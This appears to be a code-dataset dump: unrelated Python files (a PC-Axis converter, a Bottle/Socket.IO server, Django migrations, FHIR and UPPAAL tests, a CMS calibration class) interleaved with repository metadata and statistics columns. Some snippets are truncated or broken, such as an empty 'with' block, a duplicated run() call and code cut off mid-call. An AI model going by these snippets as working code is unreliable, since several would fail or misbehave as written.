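print(slugify(u"Ikä ryhmä", given_out=seen))  # ika_ryhma
print(slugify(u"Ikä ryhmä", given_out=seen))  # ika_ryhma_
```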
PxSyntaxError = px_reader.PxSyntaxError
def to_cube(pcaxis_data, origin_url=None, Sluger=Sluger):
    px = px_reader.Px(pcaxis_data)
    cube = OrderedDict()
    metadata = OrderedDict()

    def setmeta(target, src):
        if not hasattr(px, src):
            return
        metadata[target] = getattr(px, src)

    setmeta('title', 'title')
    setmeta('source', 'source')
    if origin_url:
        metadata['origin_url'] = origin_url
    if hasattr(px, 'last-updated'):
        metadata['updated'] = getattr(px, 'updated_dt').isoformat()
    setmeta('note', 'note')
    cube['metadata'] = metadata

    if hasattr(px, 'codes'):
        codes = px.codes
    else:
        codes = {}

    dimensions = []
    dim_sluger = Sluger()
    for label, px_categories in px.values.iteritems():
        # Look up in the (possibly empty) fallback dict, not px.codes,
        # which may not exist on this Px object.
        if label in codes:
            cat_ids = codes[label]
        else:
            cat_sluger = Sluger()
            cat_ids = [cat_sluger(c) for c in px_categories]
        categories = []
        for cat_id, cat_label in zip(cat_ids, px_categories):
            cat = dict(id=cat_id, label=cat_label)
            categories.append(cat)
        dimension = dict(
            id=dim_sluger(label),
            label=label,
            categories=categories
        )
        dimensions.append(dimension)
    cube['dimensions'] = dimensions

    # TODO: Casting?
    # TODO: Add a public method to get raw
    # data from a Px-object
    values = px._data.split()
    cube['value_dimensions'] = [
        dict(id=dim_sluger('value'), values=values)
    ]
    return _DataCube(cube)
| 22 | 61 | 0.686124 | 284 | 2,090 | 4.887324 | 0.338028 | 0.025937 | 0.017291 | 0.021614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000585 | 0.181818 | 2,090 | 94 | 62 | 22.234043 | 0.811111 | 0.066986 | 0 | 0.055556 | 0 | 0 | 0.070031 | 0 | 0 | 0 | 0 | 0.010638 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e204483fe351d8b8c3d7163c557940ac5a53c2d | 951 | py | Python | socketio/web.py | falleco/sample-websockets | ad600c4531fd2120b1424b459ad80697d723e435 | [
"MIT"
] | null | null | null | socketio/web.py | falleco/sample-websockets | ad600c4531fd2120b1424b459ad80697d723e435 | [
"MIT"
] | null | null | null | socketio/web.py | falleco/sample-websockets | ad600c4531fd2120b1424b459ad80697d723e435 | [
"MIT"
] | null | null | null | # import sys
# sys.path.insert(0, "lib/gevent-0.13.8")
# sys.path.insert(0, "lib/bottle")
# sys.path.insert(0, "lib/gevent-socketio")
from gevent import monkey
monkey.patch_all()
#
from socketio import socketio_manage, mixins
from socketio.namespace import BaseNamespace
from bottle import route, run, view, request, static_file
class HeartBeatNamespace(BaseNamespace, mixins.BroadcastMixin):
    def on_beat(self, msg):
        print "On beat!"
        self.broadcast_event("pulse", "")


@route('/')
@view("index")
def index():
    return {}


@route("/static/<file:path>")
def static(file):
    return static_file(file, root="static")


@route('/socket.io/<remaining:path>')
def socketio_service(remaining):
    context = {'/beat': HeartBeatNamespace}
    socketio_manage(request.environ, context, request)


if __name__ == "__main__":
    run(host='localhost', port=8080, debug=True, reloader=True, server="geventSocketIO", resource="socket.io")
run(host='localhost', port=8080, debug=True, reloader=True, server="geventSocketIO", resource="socket.io") | 25.702703 | 110 | 0.710831 | 122 | 951 | 5.409836 | 0.483607 | 0.060606 | 0.059091 | 0.063636 | 0.095455 | 0.069697 | 0 | 0 | 0 | 0 | 0 | 0.01335 | 0.133544 | 951 | 37 | 110 | 25.702703 | 0.787621 | 0.131441 | 0 | 0 | 0 | 0 | 0.141291 | 0.032887 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.181818 | null | null | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e2063365732693edaa9ba388b9fb75a35d453c0 | 633 | py | Python | imagesave.py | aasthabhat/Alzheimer-s-Disease-Prediction | 0e60fa35ef81bc9241706ee0c0f12a9683071181 | [
"MIT"
] | null | null | null | imagesave.py | aasthabhat/Alzheimer-s-Disease-Prediction | 0e60fa35ef81bc9241706ee0c0f12a9683071181 | [
"MIT"
] | null | null | null | imagesave.py | aasthabhat/Alzheimer-s-Disease-Prediction | 0e60fa35ef81bc9241706ee0c0f12a9683071181 | [
"MIT"
] | 1 | 2019-10-05T18:52:10.000Z | 2019-10-05T18:52:10.000Z | import os
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
import scipy.misc
import glob
from sklearn.cluster import KMeans
import cv2 as cv
#Save the 92 index slices out of 256 2D slices of the 3D MRI image
basepath = 'C:/Users/aasth/Desktop/adni dataset'
outpath = 'C:/Users/aasth/Desktop/adni dataset/final'
os.chdir(basepath)
i=1
for entry in glob.glob('*.hdr'):
    image_array = nib.load(entry).get_data()
    data = np.rot90(image_array[:, 92, :, 0])
    image_name = 'adni' + str(i) + '.png'
    final = os.path.join(outpath, image_name)
    scipy.misc.imsave(final, data)
    i = i + 1
| 26.375 | 67 | 0.693523 | 105 | 633 | 4.133333 | 0.561905 | 0.041475 | 0.050691 | 0.082949 | 0.133641 | 0.133641 | 0 | 0 | 0 | 0 | 0 | 0.02924 | 0.189573 | 633 | 23 | 68 | 27.521739 | 0.816764 | 0.102686 | 0 | 0 | 0 | 0 | 0.163904 | 0.099448 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.421053 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8e257db2202e7ae23d7e1ad381d19796e4ee9743 | 408 | py | Python | setup.py | gunnchadwick/backtrace-python | f2a735857fd76de1e568301856a9292059689878 | [
"MIT"
] | 3 | 2017-01-05T02:25:19.000Z | 2017-08-01T14:48:08.000Z | setup.py | gunnchadwick/backtrace-python | f2a735857fd76de1e568301856a9292059689878 | [
"MIT"
] | 10 | 2016-11-30T19:54:05.000Z | 2022-01-31T16:10:07.000Z | setup.py | gunnchadwick/backtrace-python | f2a735857fd76de1e568301856a9292059689878 | [
"MIT"
] | 1 | 2021-01-03T08:52:40.000Z | 2021-01-03T08:52:40.000Z | #!/usr/bin/env python
from setuptools import setup
import backtracepython
setup(
    name='backtracepython',
    version=backtracepython.version_string,
    description='Backtrace error reporting tool for Python',
    author='Andrew Kelley',
    author_email='akelley@backtrace.io',
    packages=['backtracepython'],
    test_suite="tests",
    url='https://github.com/backtrace-labs/backtrace-python',
)
| 24 | 61 | 0.732843 | 45 | 408 | 6.577778 | 0.733333 | 0.148649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144608 | 408 | 16 | 62 | 25.5 | 0.848138 | 0.04902 | 0 | 0 | 0 | 0 | 0.410853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e2f53b44bbb5fca0d567eb53e2abb0c303b2263 | 550 | py | Python | neat-python-read-only/setup.py | anuragpapineni/Hearthbreaker-evolved-agent | d519d42babd93e3567000c33a381e93db065301c | [
"MIT"
] | null | null | null | neat-python-read-only/setup.py | anuragpapineni/Hearthbreaker-evolved-agent | d519d42babd93e3567000c33a381e93db065301c | [
"MIT"
] | null | null | null | neat-python-read-only/setup.py | anuragpapineni/Hearthbreaker-evolved-agent | d519d42babd93e3567000c33a381e93db065301c | [
"MIT"
] | null | null | null | # Installation script
from distutils.core import setup, Extension
setup(
    name='neat-python',
    version='0.1',
    description='A NEAT (NeuroEvolution of Augmenting Topologies) implementation',
    packages=['neat', 'neat/iznn', 'neat/nn', 'neat/ctrnn', 'neat/ifnn'],
    # ext_modules=[
    #     Extension('neat/iznn/iznn_cpp', ['neat/iznn/iznn.cpp']),
    #     Extension('neat/nn/ann', ['neat/nn/nn_cpp/ANN.cpp', 'neat/nn/nn_cpp/PyANN.cpp']),
    #     Extension('neat/ifnn/ifnn_cpp', ['neat/ifnn/ifnn.cpp']),
    # ],
)
| 42.307692 | 97 | 0.616364 | 69 | 550 | 4.84058 | 0.449275 | 0.071856 | 0.071856 | 0.08982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004515 | 0.194545 | 550 | 12 | 98 | 45.833333 | 0.749436 | 0.461818 | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e32af04333e07380c6816c822c35084a3b4f59b | 583 | py | Python | study/curso-em-video/exercises/056.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/056.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/056.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | soma_idade=0
media_Idade = 0
maior_idade_homem = 0
nome_velho = ''
tot_mulher_20 = 0
for i in range(0, 4):
    nome = str(input('Nome: ')).strip()
    idade = int(input('Idade: '))
    sexo = str(input('Sexo: ')).strip()
    soma_idade += idade
    # On the first iteration (i == 0) the first man is recorded unconditionally;
    # afterwards only an older man replaces him.
    if i == 0 and sexo in 'Mm':
        maior_idade_homem = idade
        nome_velho = nome
    elif sexo in 'Mm' and idade > maior_idade_homem:
        maior_idade_homem = idade
        nome_velho = nome
    if sexo in 'Ff' and idade < 20:
        tot_mulher_20 += 1
media_Idade = soma_idade / 4
print(media_Idade)
print(maior_idade_homem, nome_velho)
print(tot_mulher_20)
8e35eae710a8b76331f1d686a7885d235eff3bd9 | 408 | py | Python | shotify/imgrepo/migrations/0003_alter_image_image_src.py | moeamadou753/shopify-fall-2021 | 16d91fc6bdfbfc45bede5867dfdf3c9620bb03c7 | [
"MIT"
] | null | null | null | shotify/imgrepo/migrations/0003_alter_image_image_src.py | moeamadou753/shopify-fall-2021 | 16d91fc6bdfbfc45bede5867dfdf3c9620bb03c7 | [
"MIT"
] | null | null | null | shotify/imgrepo/migrations/0003_alter_image_image_src.py | moeamadou753/shopify-fall-2021 | 16d91fc6bdfbfc45bede5867dfdf3c9620bb03c7 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.2 on 2021-05-10 04:54
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('imgrepo', '0002_auto_20210509_2317'),
    ]

    operations = [
        migrations.AlterField(
            model_name='image',
            name='image_src',
            field=models.ImageField(upload_to='static/media/images/'),
        ),
    ]
| 21.473684 | 70 | 0.607843 | 45 | 408 | 5.377778 | 0.822222 | 0.07438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104377 | 0.272059 | 408 | 18 | 71 | 22.666667 | 0.710438 | 0.110294 | 0 | 0 | 1 | 0 | 0.177285 | 0.063712 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e384904539153730293d550a277564d6b2e9cc9 | 865 | py | Python | shrike-examples/tests/test_pipelines.py | lynochka/azure-ml-problem-sets | e7e69de763444c5603e4455e35e69e917081a4cc | [
"MIT"
] | 3 | 2021-07-27T16:28:51.000Z | 2021-11-15T18:29:02.000Z | shrike-examples/tests/test_pipelines.py | lynochka/azure-ml-problem-sets | e7e69de763444c5603e4455e35e69e917081a4cc | [
"MIT"
] | null | null | null | shrike-examples/tests/test_pipelines.py | lynochka/azure-ml-problem-sets | e7e69de763444c5603e4455e35e69e917081a4cc | [
"MIT"
] | 7 | 2021-08-09T15:04:03.000Z | 2022-03-09T05:48:56.000Z | """
PyTest suite for testing all runnable pipelines.
"""
import sys
from unittest.mock import patch
# To-Do: import your pipeline class
### Pipeline validation tests (integration tests)
def test_demo_subgraph_build_local(pipeline_config_path="pipelines/config"):
""" Tests the subgraph demo graph by running the main function itself (which does .validate()) """
testargs = [
"prog",
"--config-dir",
pipeline_config_path,
"--config-name",
"experiments/<YourExperimentConfigFile>", # To-Do: point to the right config file
"module_loader.use_local='<ComponentKey>'", # To-Do: make sure the local version is used for ALL components - '*' could be helpful here
]
# will do everything except submit :)
with patch.object(sys, "argv", testargs):
# To-Do: call the main method of your pipeline
| 34.6 | 143 | 0.684393 | 110 | 865 | 5.290909 | 0.654545 | 0.027491 | 0.061856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209249 | 865 | 24 | 144 | 36.041667 | 0.850877 | 0.332948 | 0 | 0 | 0 | 0 | 0.306763 | 0.188406 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e3a21a413a7266a07a6dd162f70fc95c0ea081b | 597 | py | Python | apps/home/migrations/0004_results.py | gwhong917/A_C_C | 1cd75a2e439f86bcbf1e6d9e1ac454f7dd276540 | [
"MIT"
] | null | null | null | apps/home/migrations/0004_results.py | gwhong917/A_C_C | 1cd75a2e439f86bcbf1e6d9e1ac454f7dd276540 | [
"MIT"
] | null | null | null | apps/home/migrations/0004_results.py | gwhong917/A_C_C | 1cd75a2e439f86bcbf1e6d9e1ac454f7dd276540 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.3 on 2022-02-28 16:55
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('home', '0003_auto_20220228_1112'),
    ]

    operations = [
        migrations.CreateModel(
            name='Results',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('recepts_num', models.IntegerField(db_column='recept_num')),
                ('judge', models.IntegerField(db_column='judge')),
            ],
        ),
    ]
| 27.136364 | 114 | 0.58459 | 62 | 597 | 5.467742 | 0.709677 | 0.106195 | 0.117994 | 0.153392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072261 | 0.281407 | 597 | 21 | 115 | 28.428571 | 0.717949 | 0.075377 | 0 | 0 | 1 | 0 | 0.125455 | 0.041818 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e3e4c944fc3b4410a8579c18786cca183d9b56e | 3,514 | py | Python | fhir/resources/tests/test_terminologycapabilities.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_terminologycapabilities.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_terminologycapabilities.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/TerminologyCapabilities
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import terminologycapabilities
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class TerminologyCapabilitiesTests(unittest.TestCase):
    def instantiate_from(self, filename):
        datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
        with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
            js = json.load(handle)
        self.assertEqual("TerminologyCapabilities", js["resourceType"])
        return terminologycapabilities.TerminologyCapabilities(js)

    def testTerminologyCapabilities1(self):
        inst = self.instantiate_from("terminologycapabilities-example.json")
        self.assertIsNotNone(
            inst, "Must have instantiated a TerminologyCapabilities instance"
        )
        self.implTerminologyCapabilities1(inst)

        js = inst.as_json()
        self.assertEqual("TerminologyCapabilities", js["resourceType"])
        inst2 = terminologycapabilities.TerminologyCapabilities(js)
        self.implTerminologyCapabilities1(inst2)

    def implTerminologyCapabilities1(self, inst):
        self.assertEqual(force_bytes(inst.codeSearch), force_bytes("explicit"))
        self.assertEqual(
            force_bytes(inst.contact[0].name), force_bytes("System Administrator")
        )
        self.assertEqual(
            force_bytes(inst.contact[0].telecom[0].system), force_bytes("email")
        )
        self.assertEqual(
            force_bytes(inst.contact[0].telecom[0].value), force_bytes("wile@acme.org")
        )
        self.assertEqual(inst.date.date, FHIRDate("2012-01-04").date)
        self.assertEqual(inst.date.as_json(), "2012-01-04")
        self.assertEqual(
            force_bytes(inst.description),
            force_bytes(
                "This is the FHIR capability statement for the main EHR at ACME for the private interface - it does not describe the public interface"
            ),
        )
        self.assertTrue(inst.experimental)
        self.assertEqual(force_bytes(inst.id), force_bytes("example"))
        self.assertEqual(
            force_bytes(inst.implementation.description),
            force_bytes("Acme Terminology Server"),
        )
        self.assertEqual(
            force_bytes(inst.implementation.url), force_bytes("http://example.org/tx")
        )
        self.assertEqual(force_bytes(inst.kind), force_bytes("instance"))
        self.assertEqual(force_bytes(inst.name), force_bytes("ACME-EHR"))
        self.assertEqual(force_bytes(inst.publisher), force_bytes("ACME Corporation"))
        self.assertEqual(force_bytes(inst.software.name), force_bytes("TxServer"))
        self.assertEqual(force_bytes(inst.software.version), force_bytes("0.1.2"))
        self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
        self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
        self.assertEqual(
            force_bytes(inst.title), force_bytes("ACME EHR capability statement")
        )
        self.assertEqual(
            force_bytes(inst.url),
            force_bytes("urn:uuid:68D043B5-9ECF-4559-A57A-396E0D452311"),
        )
        self.assertEqual(force_bytes(inst.version), force_bytes("20130510"))
| 40.860465 | 150 | 0.678714 | 385 | 3,514 | 6.080519 | 0.353247 | 0.158052 | 0.15378 | 0.192226 | 0.303289 | 0.122597 | 0.05425 | 0.038445 | 0.038445 | 0 | 0 | 0.034335 | 0.204326 | 3,514 | 85 | 151 | 41.341176 | 0.802933 | 0.053216 | 0 | 0.144928 | 0 | 0.014493 | 0.178668 | 0.051522 | 0 | 0 | 0 | 0 | 0.347826 | 1 | 0.043478 | false | 0 | 0.115942 | 0 | 0.188406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e3fa716520a8c4514b44001a704b29ff37a613f | 1,332 | py | Python | omstools/RNAseq/general/expression_table_tools.py | bioShaun/OM004script | d604b565ae220f2ec7bfba7a8ef44018e7a33c12 | [
"MIT"
] | null | null | null | omstools/RNAseq/general/expression_table_tools.py | bioShaun/OM004script | d604b565ae220f2ec7bfba7a8ef44018e7a33c12 | [
"MIT"
] | null | null | null | omstools/RNAseq/general/expression_table_tools.py | bioShaun/OM004script | d604b565ae220f2ec7bfba7a8ef44018e7a33c12 | [
"MIT"
] | 1 | 2018-05-06T03:14:39.000Z | 2018-05-06T03:14:39.000Z | #! /usr/bin/env python
import pandas as pd
import click
'''
gene expression matrix, with gene id in first column,
gene expression level of each sample in othre columns.
'''
@click.group(chain=True, invoke_without_command=True)
@click.argument('exp_table', type=click.STRING, required=True)
@click.pass_context
def main(ctx, exp_table):
ctx.obj['exp_table'] = exp_table
@main.command('merge_by_group')
@click.option(
'-s',
'--sample_inf',
type=click.STRING,
required=True,
help='sample vs group file, with group id in first column,\
sample id in second column, seperated with tab.')
@click.option(
'-o',
'--output',
type=click.STRING,
default='genes.group.matrix.txt',
help='table with mean expression level of each group.')
@click.pass_context
def merge_by_group(ctx, sample_inf, output):
sample_df = pd.read_table(sample_inf, header=None, index_col=1)
gene_exp_df = pd.read_table(ctx.obj['exp_table'], index_col=0)
sample_df.columns = ['Group']
merged_df = pd.merge(
sample_df, gene_exp_df.T, left_index=True, right_index=True)
merged_df_group = merged_df.groupby(['Group'])
out_df = merged_df_group.mean().T
out_df.to_csv(output, sep='\t')
if __name__ == '__main__':
main(obj={})
| 28.956522 | 69 | 0.668919 | 196 | 1,332 | 4.311224 | 0.392857 | 0.047337 | 0.053254 | 0.035503 | 0.108876 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001874 | 0.198949 | 1,332 | 45 | 70 | 29.6 | 0.790066 | 0.015766 | 0 | 0.181818 | 0 | 0 | 0.13403 | 0.019147 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0.060606 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8e46835d4dab379dfaa85e0dd7f14a2858fee546 | 3,144 | py | Python | tests/ast/parsers/test_uppaal_xml_model_parser.py | S-Lehmann/uppyyl-simulator | 1166432cd766165df2cab9f13c1285624d7c01c1 | [
"MIT"
] | 2 | 2020-09-09T15:42:23.000Z | 2020-11-04T17:50:57.000Z | tests/ast/parsers/test_uppaal_xml_model_parser.py | S-Lehmann/uppyyl-simulator | 1166432cd766165df2cab9f13c1285624d7c01c1 | [
"MIT"
] | null | null | null | tests/ast/parsers/test_uppaal_xml_model_parser.py | S-Lehmann/uppyyl-simulator | 1166432cd766165df2cab9f13c1285624d7c01c1 | [
"MIT"
] | null | null | null | import os
import pathlib
import pprint
import unittest
from uppyyl_simulator.backend.ast.parsers.uppaal_xml_model_parser import (
    uppaal_xml_to_dict, uppaal_dict_to_system, uppaal_system_to_dict, uppaal_dict_to_xml
)
pp = pprint.PrettyPrinter(indent=4, compact=True)
printExpectedResults = False
printActualResults = False
test_model_path = './res/tests/uppaal_xml_testmodel.xml'
generated_model_folder = './res/tests/created_models'
######################
# Uppaal XML to dict #
######################
class TestUppaalXMLToDict(unittest.TestCase):
    def setUp(self):
        with open(test_model_path) as file:
            uppaal_test_model_str = file.read()
        self.system_xml_str = uppaal_test_model_str
        print("")

    def test_uppaal_xml_to_dict(self):
        _dict_data = uppaal_xml_to_dict(self.system_xml_str)
        # print(dict_data)


#########################
# Uppaal dict to system #
#########################
class TestUppaalDictToSystem(unittest.TestCase):
    def setUp(self):
        with open(test_model_path) as file:
            uppaal_test_model_str = file.read()
        self.system_xml_str = uppaal_test_model_str
        print("")

    def test_uppaal_dict_to_system(self):
        dict_data = uppaal_xml_to_dict(self.system_xml_str)
        _system = uppaal_dict_to_system(dict_data)
        # print(system)


######################
# Uppaal dict to XML #
######################
class TestUppaalDictToXML(unittest.TestCase):
    def setUp(self):
        with open(test_model_path) as file:
            uppaal_test_model_str = file.read()
        self.system_xml_str = uppaal_test_model_str
        print("")

    def test_uppaal_dict_to_system(self):
        dict_data = uppaal_xml_to_dict(self.system_xml_str)
        system_xml_str = uppaal_dict_to_xml(dict_data)

        generated_model_name = 'testmodel.xml'
        generated_model_path = os.path.join(generated_model_folder, generated_model_name)
        pathlib.Path(generated_model_folder).mkdir(parents=True, exist_ok=True)
        with open(generated_model_path, 'w') as file:
            file.write(system_xml_str)
        # print(system_xml_str)


#########################
# Uppaal XML full cycle #
#########################
class TestUppaalXMLFullCycle(unittest.TestCase):
    def setUp(self):
        with open(test_model_path) as file:
            uppaal_test_model_str = file.read()
        self.system_xml_str = uppaal_test_model_str
        print("")

    def test_uppaal_dict_to_system(self):
        dict_data = uppaal_xml_to_dict(self.system_xml_str)
        system = uppaal_dict_to_system(dict_data)
        dict_data_rev = uppaal_system_to_dict(system)
        system_xml_str_rev = uppaal_dict_to_xml(dict_data_rev)

        generated_model_name = 'testmodel_full_cycle.xml'
        generated_model_path = os.path.join(generated_model_folder, generated_model_name)
        pathlib.Path(generated_model_folder).mkdir(parents=True, exist_ok=True)
        with open(generated_model_path, 'w') as file:
            file.write(system_xml_str_rev)
        # print(system_xml_str_rev)


if __name__ == '__main__':
    unittest.main()
| 32.412371 | 89 | 0.675573 | 408 | 3,144 | 4.767157 | 0.161765 | 0.064781 | 0.086375 | 0.074036 | 0.679177 | 0.643188 | 0.627249 | 0.602571 | 0.602571 | 0.602571 | 0 | 0.000393 | 0.190204 | 3,144 | 96 | 90 | 32.75 | 0.763551 | 0.051209 | 0 | 0.52459 | 0 | 0 | 0.039096 | 0.030846 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131148 | false | 0 | 0.081967 | 0 | 0.278689 | 0.131148 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e4bf6aee8a7192603975091182590a4593906f9 | 4,160 | py | Python | CalibMuon/DTCalibration/python/Workflow/DTDQMValidation.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | CalibMuon/DTCalibration/python/Workflow/DTDQMValidation.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | CalibMuon/DTCalibration/python/Workflow/DTDQMValidation.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | from tools import loadCmsProcess,loadCrabCfg,loadCrabDefault,addCrabInputFile,writeCfg,prependPaths
from addPoolDBESSource import addPoolDBESSource
from CrabTask import *
import os
class DTDQMValidation:
    #def __init__(self, run, dir, input_db, config):
    def __init__(self, run, dir, config):
        self.outputfile = 'DQM.root'
        self.config = config
        self.dir = dir
        #self.inputdb = input_db

        self.pset_name = 'dtDQM_cfg.py'
        self.pset_template = 'CalibMuon.DTCalibration.dtDQMAlca_cfg'
        if hasattr(self.config,'runOnCosmics') and self.config.runOnCosmics:
            self.pset_template = 'CalibMuon.DTCalibration.dtDQMAlca_cosmics_cfg'

        self.process = None
        self.crab_cfg = None
        self.initProcess()
        self.initCrab()
        self.task = CrabTask(self.dir,self.crab_cfg)

    def initProcess(self):
        self.process = loadCmsProcess(self.pset_template)
        self.process.GlobalTag.globaltag = self.config.globaltag

        if hasattr(self.config,'inputDBTag') and self.config.inputDBTag:
            tag = self.config.inputDBTag
            record = self.config.inputDBRcd
            connect = self.config.connectStrDBTag
            moduleName = 'customDB%s' % record
            addPoolDBESSource(process = self.process,
                              moduleName = moduleName,record = record,tag = tag,
                              connect = connect)

        if hasattr(self.config,'inputTTrigDB') and self.config.inputTTrigDB:
            label = ''
            if hasattr(self.config,'runOnCosmics') and self.config.runOnCosmics: label = 'cosmics'
            addPoolDBESSource(process = self.process,
                              moduleName = 'tTrigDB',record = 'DTTtrigRcd',tag = 'ttrig',label = label,
                              connect = 'sqlite_file:%s' % os.path.basename(self.config.inputTTrigDB))

        if hasattr(self.config,'inputVDriftDB') and self.config.inputVDriftDB:
            addPoolDBESSource(process = self.process,
                              moduleName = 'vDriftDB',record = 'DTMtimeRcd',tag = 'vDrift',
                              connect = 'sqlite_file:%s' % os.path.basename(self.config.inputVDriftDB))

        if hasattr(self.config,'inputT0DB') and self.config.inputT0DB:
            addPoolDBESSource(process = self.process,
